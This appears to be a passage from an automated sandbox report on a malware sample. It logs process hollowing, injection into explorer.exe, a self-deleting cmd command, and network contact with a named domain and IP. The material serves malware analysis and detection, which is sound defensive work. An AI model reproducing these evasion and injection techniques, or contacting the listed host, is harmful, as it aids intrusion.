Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03741B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03741B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037ED380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0375AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0375AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0375AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0375AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0375AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0377927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0374766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037EB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037EB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03800EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03800EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03800EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037C4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03739240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03739240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03739240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03739240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03747E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03747E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03747E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03747E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03747E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03747E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037EFE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0373E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03808ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03774A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03774A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03735210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03735210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03735210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03735210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0373AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0373AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03753A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0376A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0376A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0373C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0373C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0373C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03768E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037F1608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03748A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03762AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037616E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037476E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03778EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037636CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03762ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037EFEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0374AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0374AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0376FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0376D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0376D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03808A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037CFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0373B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0373B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0375C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0375C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0373C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03757D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_038005AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_038005AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0375B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0375B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03773D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03743D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03743D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03743D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03743D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03743D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03743D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03743D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03743D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03743D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03743D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03743D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03743D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03743D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0373AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0376513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0376513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037BA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03764D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03764D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03764D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03754120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03754120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03754120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03754120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03754120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03739100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03739100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03739100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037E8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0373B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0373B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0373B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037C41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0374D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0374D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03808D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03761DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03761DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03761DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037661A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037661A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037635A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03762990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0376FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0376FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0376A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0375C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03762581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03762581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03762581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03762581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03732D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03732D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03732D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03732D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03732D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037F2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0375746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03750050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03750050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037CC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037CC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0376A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03808CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0376BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0376002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0376002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0376002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0376002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0376002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0374B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0374B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0374B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0374B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037F14FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B6CF0 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\netsh.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.hoatao.xyz
Source: C:\Windows\explorer.exe	Network Connect: 54.169.219.94 80

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe

Memory written: C:\Users\user\Desktop\#6495PI-29458-2020.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Thread register set: target process: 3440
Source: C:\Windows\SysWOW64\netsh.exe	Thread register set: target process: 3440

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe

Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 9E0000

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process created: C:\Users\user\Desktop\#6495PI-29458-2020.exe {path}
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\#6495PI-29458-2020.exe'

Source: explorer.exe, 0000000E.00000000.472681290.0000000000EE0000.00000002.00000001.sdmp, netsh.exe, 00000014.00000002.608567792.0000000004BA0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000E.00000000.472681290.0000000000EE0000.00000002.00000001.sdmp, netsh.exe, 00000014.00000002.608567792.0000000004BA0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000E.00000000.472681290.0000000000EE0000.00000002.00000001.sdmp, netsh.exe, 00000014.00000002.608567792.0000000004BA0000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: explorer.exe, 0000000E.00000000.472681290.0000000000EE0000.00000002.00000001.sdmp, netsh.exe, 00000014.00000002.608567792.0000000004BA0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Users\user\Desktop\#6495PI-29458-2020.exe VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
